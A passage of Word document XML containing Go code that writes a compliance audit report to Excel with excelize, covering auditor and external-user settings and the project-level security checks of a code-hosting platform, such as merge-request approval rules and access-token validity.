    <w:p w14:paraId="60F618AF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1DEC4E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FF5A69" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计审计人员数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C1B1B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E88DB0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>auditor_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4190703B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>auditor := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E525C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551A85D6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D4A97" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Auditor.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873799E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Auditor.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D787F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Auditor.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4484C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Auditor.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6733D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Auditor.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DFA6A7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C09370D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, auditor_name, &amp;auditor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891B427" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9327A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D26B42" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A697CE5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE946B1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计外部用户数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F49C48C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C061D4E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>external_user_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019F0924" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>external_user := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E4859" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039A66DD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568D3C5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.External.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31912234" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.External.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA057A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.External.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7210D1F7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.External.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53D6DD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.External.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D667F93" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70391972" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, external_user_name, &amp;external_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59920B98" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D3B6AF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F144A11" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A36A1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DBEB121" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// ----- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目维度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279E1562" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A714A2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>sheetName_Project := "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CF885C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>f.NewSheet(sheetName_Project)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAEEE7C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48000CAD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F31C8B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>title = []string{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9AD637" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818CE06" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目命名空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4B869" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C437447" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止建立</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0A35B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>媒体文件链接时是否需要验证登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2917B28D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全与合规</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29928F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的人审批</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE8286E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的人审批</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63CB70" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>阻止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可以编辑审批规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8092D4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批准时需要密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658DB4B1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时若有新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是否撤销批准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0859D6CD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审批</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的人数合规</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79922A8B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合规性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77771FE9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不合规描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301032F1" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目访问令牌的有效期是否过长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F26C8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用或禁用合并管道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
